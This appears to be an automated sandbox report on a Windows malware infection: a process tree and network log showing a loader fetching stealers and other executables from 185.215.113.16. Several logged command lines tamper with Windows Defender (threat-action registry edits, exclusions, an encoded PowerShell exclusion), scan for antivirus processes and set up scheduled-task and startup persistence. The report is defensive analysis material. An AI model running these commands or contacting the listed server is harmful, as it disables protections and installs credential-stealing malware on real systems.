    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1840
  - - C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe
      "C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5076
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4512
  - - C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
      "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1700
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4408
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4500
      - C:\Users\Admin\AppData\Roaming\TL5gaXPKXp.exe
        
        "C:\Users\Admin\AppData\Roaming\TL5gaXPKXp.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3740
      - C:\Users\Admin\AppData\Roaming\OfLLdqx0bP.exe
        
        "C:\Users\Admin\AppData\Roaming\OfLLdqx0bP.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3256
  - - C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
      "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3400
    - - C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3264
  - - C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
      "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4940
  - - C:\Users\Admin\AppData\Local\Temp\1000129001\caesium-image-compressor.exe
      "C:\Users\Admin\AppData\Local\Temp\1000129001\caesium-image-compressor.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2688
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3392
  - - C:\Users\Admin\AppData\Local\Temp\1000191001\BitcoinCore.exe
      "C:\Users\Admin\AppData\Local\Temp\1000191001\BitcoinCore.exe"
      4⤵
      Executes dropped EXE
      PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\1000228001\PureSyncInst.exe
      "C:\Users\Admin\AppData\Local\Temp\1000228001\PureSyncInst.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:3004
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5060
  - - C:\Users\Admin\AppData\Local\Temp\1000234001\runtime.exe
      "C:\Users\Admin\AppData\Local\Temp\1000234001\runtime.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:4052
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3460
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4372
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5032
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4352
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1880
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 591950
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4264
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BachelorRayPotentialBeats" Itsa
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4008
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1740
      - C:\Users\Admin\AppData\Local\Temp\591950\Shipment.pif
        
        Shipment.pif E
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\1000255001\channel2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000255001\channel2.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4576
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
        8⤵
        
        PID:3972
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1792
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4816
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4080
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4400
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 684126
        9⤵
        
        PID:3460
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "VegetablesIndividualBindingGba" Ever
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5000
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif
        
        Intake.pif C
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1432
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\1000261001\PQP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000261001\PQP.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\7zSC9AF.tmp\Install.exe
        
        .\Install.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5736
        
        C:\Users\Admin\AppData\Local\Temp\7zSCBC2.tmp\Install.exe
        
        .\Install.exe /kHdidM "385107" /S
        9⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:5816
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6480
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        11⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:6808
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:6960
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:5380
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        11⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:5624
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:5844
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:6108
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        11⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:3460
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:5984
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:6252
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        11⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:3984
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:6260
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:5592
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        11⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:4956
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:6300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6324
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        14⤵
        System Location Discovery: System Language Discovery
        
        PID:3308
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        10⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:6864
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6200
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        13⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5576
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bISIDNXXYteSJEZXLD" /SC once /ST 10:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSCBC2.tmp\Install.exe\" W7 /vTVJdidGtw 385107 /S" /V1 /F
        10⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:6620
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3816
  - - C:\Users\Admin\AppData\Local\Temp\1000235001\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\1000235001\setup.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:2240
    - - C:\Users\Admin\AppData\Local\Temp\1000235001\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000235001\setup.exe" -sfxwaitall:1 "setuptmp.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1188
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\setuptmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\setuptmp.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2360
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        5⤵
        
        PID:392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
  2⤵
  PID:4512
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
  2⤵
  - Drops startup file
  PID:4552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3544
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4644
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:5060

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:412

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3404

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4900

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:1852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:7116

Network

DNS

104.219.191.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.219.191.52.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/crypteda.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/crypteda.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:16 GMT
Content-Type: application/octet-stream
Content-Length: 1104936
Last-Modified: Mon, 19 Aug 2024 12:56:48 GMT
Connection: keep-alive
ETag: "66c34110-10dc28"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/stealc_default2.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/stealc_default2.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:20 GMT
Content-Type: application/octet-stream
Content-Length: 192000
Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT
Connection: keep-alive
ETag: "66c9f4f9-2ee00"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/BitcoinCore.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/BitcoinCore.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:39:35 GMT
Content-Type: application/octet-stream
Content-Length: 10481152
Last-Modified: Sun, 25 Aug 2024 13:30:36 GMT
Connection: keep-alive
ETag: "66cb31fc-9fee00"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 31 Aug 2024 10:40:07 GMT
